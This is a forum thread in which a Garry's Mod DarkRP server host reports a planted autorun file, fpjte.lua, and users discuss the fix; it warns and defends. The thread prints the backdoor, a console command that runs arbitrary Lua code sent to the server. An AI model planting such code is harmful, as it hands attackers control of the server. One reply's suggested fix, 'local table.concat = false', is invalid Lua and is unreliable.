Check you autorun folder for fpjte.lua

I host a Dark RP server for a community and today when they wanted to reinstall and we found this in the lua/autorun folder which I have been told allows the person to take over the server.

FPJTE.lua

if (SERVER) then
concommand.Add("_l", function(a,b,c)
RunString(table.concat(c, " "))
end )
end

If you have a good server host, they have modules for install from wherever the hell the source is that I can’t for the life of me remember, that prevent that exploit. (Arbitrary file uploading.) .

Well this was uploaded on the 7th november well before the scare about the new exploit was made. I am the host lol, and all my clients have DFENS installed but someone on here said it can be exploited anyway.

In init.lua
[lua]local table.concat = false[/lua]

I’m sure it’s that or something…

Note to coders if you think it’s wrong post better please…

Delete the file.

The server has been reinstalled now with your file upload/download fix added.